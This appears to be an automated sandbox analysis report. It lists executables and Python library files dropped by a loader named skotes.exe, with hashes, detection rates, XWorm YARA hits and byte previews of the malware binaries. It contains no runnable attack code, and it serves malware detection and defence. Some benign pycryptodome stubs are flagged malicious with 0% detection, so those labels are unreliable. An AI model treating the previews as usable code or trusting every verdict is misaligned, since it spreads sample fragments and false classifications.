                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....t}g................................. ........@.. ....................................@.................................X...S................................................................................... ............... ..H............text........ ...................... ..`.rsrc..............................@..@.reloc...............Z..............@..B........................H........s..XX......$.....................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1771008
                                                                                                                                            Entropy (8bit):6.829704744143836
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:CS3RWpdupsY0HhzA6AydDu9H73NvHgTxRnqY33u4citY1HtFPMRWpYp:3idupsYohzA6AydDu9leXu4ciGHi
                                                                                                                                            MD5:1C0FDE14F7A46816A2E8A747A90E1584
                                                                                                                                            SHA1:76EDA2D23786BE801521479B6C83D97C16B27879
                                                                                                                                            SHA-256:D2638065D9C0CF218EFA5E05DC67E282110E854DE56D4A124D3DF57068B2E3E3
                                                                                                                                            SHA-512:AE60B7D606BB2B8D1AF89CD828386AD33EC85FD75ADB7810EE988445880412E5CD71584327167E839B1F6C6DB5F876F9F88D4BAEB862ABFCE085FA43D70CEC3F
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.7.K.d.K.d.K.dT9.e.K.dT9.e.K.dT9.e3K.dT9.e.K.dT9.e.K.d.K.d.I.d.>.e.K.d.>.e.K.d.>.e.K.d.>.e.K.d.>9d.K.d.KQd.K.d.>.e.K.dRich.K.d........PE..L......`.....................v......T.............@..........................`.......L......................................|+..@....................`.. J..........@...8...........................x...@............................................text............................... ..`.rdata..............................@..@.data...tM...`... ...B..............@....rsrc................b..............@..@........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1863680
                                                                                                                                            Entropy (8bit):7.949536612027424
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:ldJxwCiS1hWdXbvAy9Ve45uoMrngyTQ2jcBxiu8RjkvXc:ld4u1hwAqe45argbX82vX
                                                                                                                                            MD5:89CF32E94C9A6312D70F99607678E53F
                                                                                                                                            SHA1:DF7D7BC10668EF9F08BECD125B53CDDC4161CD29
                                                                                                                                            SHA-256:7CAB621F2D3718A277BD18BB1A595214B3F59F6FB9CD767C41F5E42A5A54A3C9
                                                                                                                                            SHA-512:9A0AE8FC5763E58F31F6022AF90B23B276937AE0C1B740A3BEE7D72772EA74623AF128B73AECC117CD1C0F744559D5B51256B26EB004BAE81F54C75DEB6C0828
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...TQ}g.................(............I...........@...........................J...........@.................................Y`..m....P.......................a...................................................................................... . .@.......|..................@....rsrc........P......................@....idata .....`......................@... ..*..p......................@...ulxuyjiv......0.....................@...scqvijkn......I......J..............@....taggant.0....I.."...N..............@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4440576
                                                                                                                                            Entropy (8bit):7.987295833950863
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:+CKTwgrDzzSsiXwi2oXGKicGBMqUo3vxCRf12bd:nKTTrDzGsiXwJM29BT/xCRf1q
                                                                                                                                            MD5:C9A3FA54A4AA25263EE9E81172DB3BDF
                                                                                                                                            SHA1:596E6B43C197AEEEA1DC5EDF330EF4B889980FFE
                                                                                                                                            SHA-256:7C3FB6A3953259BB51B2C5ED0CC5059A9DCA9D890E873FB2E72B0378ED242F97
                                                                                                                                            SHA-512:372BD612259369266EC4739116432C0FF5926695E03AD34193DCDF0C96BE54F37E018F5B72AB57D543186232235734D63ECB6CFCEB7EFFC56740C318F71A1060
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a{g...............(..J...h..2...p........J...@.................................._D...@... ............................._.f.s.....e...............h.....x\..............................(\...................................................... . ..e.......(.................@....rsrc.........e.......(.............@....idata ......f.......(.............@... .P8...f.......(.............@...hasiulpx.....`........(.............@...eqgokjfj.....`........C.............@....taggant.0...p..."....C.............@...........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):64
                                                                                                                                            Entropy (8bit):1.1510207563435464
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                                                                                            MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                                                                                            SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                                                                                            SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                                                                                            SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:@...e................................................@..........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27136
                                                                                                                                            Entropy (8bit):5.886585917020445
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:IUkOZ0l/h1dhJIiBzqY0kj0BZK4BUbL0c5PJ7W7nRWr4Ih/VoxXL5ly2W+3W9usk:NbLGhKhjyNYsRnTBAtHzae6M
                                                                                                                                            MD5:86268AF17C4C5AFF970734EB5775A7F8
                                                                                                                                            SHA1:2C77E4720C8EB3AB8ACEF2E758B649D63FE16755
                                                                                                                                            SHA-256:6D8199A84B7256CF46B852E911221165C7FA044FBFC1642EF9ED24FFEE666470
                                                                                                                                            SHA-512:5443662D4A761FC77CBEE8883FF3677D7C1755DCA45D9F80440F211B1ECD19B695906B8A06027C980E5A5DC1B08010202E5653C63CC2658956D7D63F43BE65FF
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 16%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..J..........zh... ........@.. ....................................`.................................%h..O....................................g..8............................................ ............... ..H............text....H... ...J.................. ..`.rsrc................L..............@..@.reloc...............h..............@..B................Yh......H........B...$......&....f..............................................&.(......*...0..9........~.........,".r...p.....(....o....s............~.....+..*....0...........~.....+..*".......*.0...........~.....+..*".(.....*Vs....(....t.........*...0..f.........}.....(........o.......o...... . ...(.......(.......( ....s....( ......(!.....rC..p"...As"...o#....*...0.............($.....(%....(&...s'.....((......ri..p(....o)......8Z......(*......(+.........9.............,G...ry..p(..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1863680
                                                                                                                                            Entropy (8bit):7.949536612027424
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:ldJxwCiS1hWdXbvAy9Ve45uoMrngyTQ2jcBxiu8RjkvXc:ld4u1hwAqe45argbX82vX
                                                                                                                                            MD5:89CF32E94C9A6312D70F99607678E53F
                                                                                                                                            SHA1:DF7D7BC10668EF9F08BECD125B53CDDC4161CD29
                                                                                                                                            SHA-256:7CAB621F2D3718A277BD18BB1A595214B3F59F6FB9CD767C41F5E42A5A54A3C9
                                                                                                                                            SHA-512:9A0AE8FC5763E58F31F6022AF90B23B276937AE0C1B740A3BEE7D72772EA74623AF128B73AECC117CD1C0F744559D5B51256B26EB004BAE81F54C75DEB6C0828
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...TQ}g.................(............I...........@...........................J...........@.................................Y`..m....P.......................a...................................................................................... . .@.......|..................@....rsrc........P......................@....idata .....`......................@... ..*..p......................@...ulxuyjiv......0.....................@...scqvijkn......I......J..............@....taggant.0....I.."...N..............@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1714462
                                                                                                                                            Entropy (8bit):7.946301893129129
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:L1Dt9raflh10V8hT50WH3auKHab7SNudXjdTF:pDt9raT10VC5GOJF
                                                                                                                                            MD5:68D36FA633B4FB19D5C5B285C9A0B415
                                                                                                                                            SHA1:02A5E654832380CCEC23485DA0705DD2E748DA0C
                                                                                                                                            SHA-256:2670D23C86CF1D9B2CAEC5A61FF7D61E2D9FDB449531CAE509BB4F65D75C45C8
                                                                                                                                            SHA-512:5B250529C7092F7842260921789A12E4232B1CB4B80A188510EAC49BA0E96FEA64DCC7A588829FB009C926410126C4663BB831A62D003B96BC76FF5045785FCB
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....#=.................P...$......xd.......p....@.......................... ...................@..................................................................................................................P...L............................text....C.......D.................. ..`.itext.......`.......H.............. ..`.data........p.......T..............@....bss....LW...........b...................idata...............b..............@....tls.................r...................rdata...............r..............@..@.rsrc................t..............@..@.....................&..............@..@........................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):482304
                                                                                                                                            Entropy (8bit):3.1342365717789904
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:4FAvjMvA4v2Oh9R8DZqYplTTiX5Ak6kGyR8W5lHbRAnEmmOJOh4Zg:NjMvA4fh9qDZqYOXYyRR5lb2nEQj
                                                                                                                                            MD5:D22612D2899FC888514C3CA553B49F79
                                                                                                                                            SHA1:6DBA3A3B96225FE24229F1B39509A503547D1401
                                                                                                                                            SHA-256:B2ACD91FDCEF767FA027519E3BE0F61CE027C8BDF57027E2C161257DFA5D6543
                                                                                                                                            SHA-512:9DF54DF59FE341C0719C0D329DB4D2810DE385F133E210D6046DEB06F94BC3A3C5591A7E52906F91E93DAFB2ADC110021354FDA505B64A974274DC03E83ED4C9
                                                                                                                                            Malicious:true
                                                                                                                                            Yara Hits:
                                                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, Author: Joe Security
                                                                                                                                            • Rule: rat_win_xworm_v2, Description: Finds XWorm v2 samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, Author: Sekoia.io
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....t}g................................. ........@.. ....................................@.................................X...S................................................................................... ............... ..H............text........ ...................... ..`.rsrc..............................@..@.reloc...............Z..............@..B........................H........s..XX......$.....................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24997182
                                                                                                                                            Entropy (8bit):7.992307862787898
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:393216:hQvPJ/582VKol2VAkyoHf0O51u8MR5thr3woxkPnB/1isAlzKO4yFmE4RTdj0gNR:kPJmkpkAkhMKBorx3Lz/n4RTdIgEmSEr
                                                                                                                                            MD5:9D60674507EA97985C7E3B08D610F8D7
                                                                                                                                            SHA1:1FCCF49236815C14C5AE08ADB8D1B23846051B2D
                                                                                                                                            SHA-256:711CD08835ADD9FEECDD4AFCFB8DF8370FE98C22969FA2CB0CC010A8C8E25D12
                                                                                                                                            SHA-512:B841CD0C37171B666B8F03908B6643583D97625321F2017CAEBFB6C3F9B59ECB8F545586170D2467FE05C378E5411F1108CB3B4B53402661506FDD2F0F040DF6
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i..i.\.i..b.\.i..g.\.`.].C.\..Y.R.\..\.a.\...a.\..^.a.\.Rich`.\.........PE..d...#.@f.........."....!.h.....................@.............................P............`.............................................4......P........8......l0...........@..p....6..T....................7..(......@....................... ....................text...ng.......h.................. ..`.rdata...(.......*...l..............@..@.data...\...........................@....pdata..l0.......2..................@..@.didat..`...........................@..._RDATA..\...........................@..@.rsrc....8.......:..................@..@.reloc..p....@......."..............@..B........................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\1034107001\739ad26354.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4440576
                                                                                                                                            Entropy (8bit):7.987295833950863
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:+CKTwgrDzzSsiXwi2oXGKicGBMqUo3vxCRf12bd:nKTTrDzGsiXwJM29BT/xCRf1q
                                                                                                                                            MD5:C9A3FA54A4AA25263EE9E81172DB3BDF
                                                                                                                                            SHA1:596E6B43C197AEEEA1DC5EDF330EF4B889980FFE
                                                                                                                                            SHA-256:7C3FB6A3953259BB51B2C5ED0CC5059A9DCA9D890E873FB2E72B0378ED242F97
                                                                                                                                            SHA-512:372BD612259369266EC4739116432C0FF5926695E03AD34193DCDF0C96BE54F37E018F5B72AB57D543186232235734D63ECB6CFCEB7EFFC56740C318F71A1060
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a{g...............(..J...h..2...p........J...@.................................._D...@... ............................._.f.s.....e...............h.....x\..............................(\...................................................... . ..e.......(.................@....rsrc.........e.......(.............@....idata ......f.......(.............@... .P8...f.......(.............@...hasiulpx.....`........(.............@...eqgokjfj.....`........C.............@....taggant.0...p..."....C.............@...........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\1034108001\718e743381.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1967616
                                                                                                                                            Entropy (8bit):7.942586744122007
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:0Z7JUUPG9T4zOtKq2HydWyAjHWlP9O0C4drUzR4T+:0tPG9FXEyAEFtdrq4T+
                                                                                                                                            MD5:4F5013C5D4C13BCB3D9BB98AC601D056
                                                                                                                                            SHA1:8A4862EE54FAE9DF6AE6A8D2616B0D9D021B4FBD
                                                                                                                                            SHA-256:56DAFBBA12A48578DC834632CAA40DD7A96FA04FE04A7CAE87F60F960043C2D9
                                                                                                                                            SHA-512:CBFC65A34B1052E165677807F4A74AAEB7B14BF6E942CEAAF8B6CA2BF4F03DFD1878DEF3B31446E4910651971B3A3A4C0DE40120D2A57A0E67E1B232E9B3EA82
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i...........nG@.....ZR.....ZC.....ZU.................Z\.....ZB.....ZG....Rich...................PE..L....,.e.....................>....................@.........................................................................[.A.o.....@......................................................1...................................................... . ..@......N..................@....rsrc.........@..p...^..............@....idata ......A.....................@... ..*...A.....................@...irrkukjx......k.....................@...tvxezsde............................@....taggant.0......."..................@...........................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\1034109001\bed2608720.exe

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1771008
                                                                                                                                            Entropy (8bit):6.829704744143836
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:CS3RWpdupsY0HhzA6AydDu9H73NvHgTxRnqY33u4citY1HtFPMRWpYp:3idupsYohzA6AydDu9leXu4ciGHi
                                                                                                                                            MD5:1C0FDE14F7A46816A2E8A747A90E1584
                                                                                                                                            SHA1:76EDA2D23786BE801521479B6C83D97C16B27879
                                                                                                                                            SHA-256:D2638065D9C0CF218EFA5E05DC67E282110E854DE56D4A124D3DF57068B2E3E3
                                                                                                                                            SHA-512:AE60B7D606BB2B8D1AF89CD828386AD33EC85FD75ADB7810EE988445880412E5CD71584327167E839B1F6C6DB5F876F9F88D4BAEB862ABFCE085FA43D70CEC3F
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.7.K.d.K.d.K.dT9.e.K.dT9.e.K.dT9.e3K.dT9.e.K.dT9.e.K.d.K.d.I.d.>.e.K.d.>.e.K.d.>.e.K.d.>.e.K.d.>9d.K.d.KQd.K.d.>.e.K.dRich.K.d........PE..L......`.....................v......T.............@..........................`.......L......................................|+..@....................`.. J..........@...8...........................x...@............................................text............................... ..`.rdata..............................@..@.data...tM...`... ...B..............@....rsrc................b..............@..@........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\AES.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8694
                                                                                                                                            Entropy (8bit):5.536678334531042
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:oe65nY89EX+/NjsHXk/yiItPdZ9QjIsZFN7gggyvo:oT9vVhytPFQjIsZFNZo
                                                                                                                                            MD5:781B7F8E9F0310E2AEDF04E5E8B705FD
                                                                                                                                            SHA1:1B06139D45EB2C5AF2D29301F4539C4879A9B34F
                                                                                                                                            SHA-256:539699CEAF818DF1FE3935BAD62E88D01DE3F580BE1D53E3D3DD727270CA3726
                                                                                                                                            SHA-512:DCCB1302A77BCB88FB1D7E665D2A72129A17EA97F36F5F45CB80C6D79010F550C2302A4F77B8B9E01B87472E235251587417297EE2429AC9D4CFEC25C03FB3BC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.#........................,.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...e.d.e...............Z...d.Z...e.j.......................r ..e.d.e.......................d.d.............................Z.n.#.e.$.r...Y.n.w.x.Y.w.d...Z.d...Z.d...Z d.Z!d.Z"d.S.)......N)..._create_cipher)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_features)...get_random_bytes.......................................................a..... int AES_start_operation(const uint8_t key[],. size_t key_len,. void **pResult);. int AES_encrypt(const void *state,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int AES_decrypt(const void *state,. const uint8_t *in,. uint8_t *out,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\AES.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3775
                                                                                                                                            Entropy (8bit):4.806063133542859
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:5FYPjdtB5JjZL6mKokLSL0jcj9yYFtpZuObl9gbiYbwJbzk:5PZoUW0jcj9yYFtpZuObfgbiYbwJbzk
                                                                                                                                            MD5:B945169B742389524DF72625C079BB77
                                                                                                                                            SHA1:C9E77F8537E3B9888CBCF45E26774192ACB0C39A
                                                                                                                                            SHA-256:A0C8ED071D9E4B833FFD9BCA4658711806A4DA9D95492333EF39B61EF84FD1F6
                                                                                                                                            SHA-512:E1FAA4C936410781682007CE1C65C03D2CE947DCFB1A50D75184B075F5BEBC070A87FED4511086BBBF073EA831331BA8DFD3B87B520D5137AB80FB91D3AD4DA7
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Dict, Optional, Tuple, Union, overload..from typing_extensions import Literal....Buffer=bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_ccm import CcmMode..from Crypto.Cipher._mode_eax import EaxMode..from Crypto.Cipher._mode_gcm import GcmMode..from Crypto.Cipher._mode_siv import SivMode..from Crypto.Cipher._mode_ocb import OcbMode....MODE_ECB: Literal[1]..MODE_CBC: Literal[2]..MODE_CFB: Literal[3]..MODE_OFB: Literal[5]..MODE_CTR: Literal[6]..MODE_OPENPGP: Literal[7]..MODE_CCM: Literal[8]..MODE_EAX: Literal[9]..MODE_SIV: Literal[10]..MODE_GCM: Literal[11]..MODE_OCB: Literal[12]....# MODE_ECB..@overload..def new(key: Buffer,.. mode: Literal[1],.. use_aesni : bool = ...) ->

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\ARC2.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1020
                                                                                                                                            Entropy (8bit):4.950943296452636
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+PvpB+yE2x/NEo0EDNqDNMN3zb1DoeRHYO:K+1+O+O+s+8+s+w+Hx9GIJqJejbFoeRZ
                                                                                                                                            MD5:E00CF491B8FC5ACAF9CEF612321636A0
                                                                                                                                            SHA1:AB112C6E5D09F9A330047422454765FC4D691F1F
                                                                                                                                            SHA-256:605DD941F8ED380F3CF8906B995FCF9CFD8D801668E85B8FC889D72EC00087CD
                                                                                                                                            SHA-512:5FE5E3E20E1911E73FAB3886072A47F6C0E554C9F0D1A3604FDB8577747143C220457FB1105D565589E59A6202EE893F2F5C82A63267AEFA061BB129BA3A23C3
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....ARC2Mode = int....MODE_ECB: ARC2Mode..MODE_CBC: ARC2Mode..MODE_CFB: ARC2Mode..MODE_OFB: ARC2Mode..MODE_CTR: ARC2Mode..MODE_OPENPGP: ARC2Mode..MODE_EAX: ARC2Mode....def new(key: Buffer,.. mode: ARC2Mode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..key_s

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\ARC4.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):438
                                                                                                                                            Entropy (8bit):4.892911336139007
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBdHgMJjWrMRyDWeXRyc1APyMFq6R5wnZ0R5AomWL7Ry/O:1REUAIWrQFeBFAfnRe+RGorVYO
                                                                                                                                            MD5:F00CD9D3130AA368D5F1F10B93E0A612
                                                                                                                                            SHA1:E9C27B3918320183E7366BD1D1294B48EAC93378
                                                                                                                                            SHA-256:28855BC2FF6531EFD40C42075EB5E506AD8A5F8D98B8041FB218725C7C484054
                                                                                                                                            SHA-512:228840E70CD9FAD2CB8EA202BD45931614A9E26C619ECDBC017E832B3588C85B0BBA97B762A804DB16BE3D19481B1CC17AB616FE66D46FD66DCB38B132D2994A
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
